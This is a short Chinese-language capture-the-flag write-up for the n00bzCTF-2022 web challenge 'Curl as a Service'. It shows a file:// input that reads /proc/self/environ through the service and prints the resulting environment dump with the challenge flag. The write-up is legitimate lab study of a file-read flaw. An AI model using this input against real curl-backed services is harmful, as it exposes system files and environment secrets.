Curl as a Service[n00bzCTF-2022]

jackflank 2025-01-21 22:27:51 213 0


这道题需要我们注入curl命令之后的部分

输入一些正常语法访问外部网站都为 500 错误

尝试使用file伪协议可以查看到本机的信息

查看当前进程变量:file:///proc/self/environ

得到信息与flag

  • PATH/usr/local/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
  • HOSTNAME0ae8395f93d8b36ec38c9b8178a9ec0c
  • FLAGn00bz{4rb1t4ry_f1le_re4d_us1ng_curl_ftw!}
  • LANGC.UTF - 8
  • GPG_KEYA035C8C19219BA821ECEA86B64E628F8D684696D
  • PYTHON_VERSION3.10.1
  • PYTHON_PIP_VERSION21.2.4
  • PYTHON_SETUPTOOLS_VERSION57.5.0
  • PYTHON_GET_PIP_URLhttps://github.com/pypa/get - pip/raw/3cb8888cc2869620f57d5d2da64da38f516078c7/public/get - pip.py
  • PYTHON_GET_PIP_SHA256c518250e91a70d7b20cceb15272209a4ded2a0c263ae5776f129e0d9b5674309
  • 原题部分代码,这个文件名,你就猜吧

分类:WEB
image
作者:jackflank

4

提交

0

收入

相关WriteUP

  • cookiehead

    ***收费WriteUP请购买后查看,VIP用户可免费查看***

    • WEB
    • 1月前
  • sqli-0x1 Writeup

    ***收费WriteUP请购买后查看,VIP用户可免费查看***

    • WEB
    • 1年前
  • [HackINI-2022] lfi WriteUp

    ***收费WriteUP请购买后查看,VIP用户可免费查看***

    • WEB
    • 1年前
  • just-work-type

    ***收费WriteUP请购买后查看,VIP用户可免费查看***

    • WEB
    • 1年前
  • SQL注入.2

    ***收费WriteUP请购买后查看,VIP用户可免费查看***

    • WEB
    • 3月前
问题反馈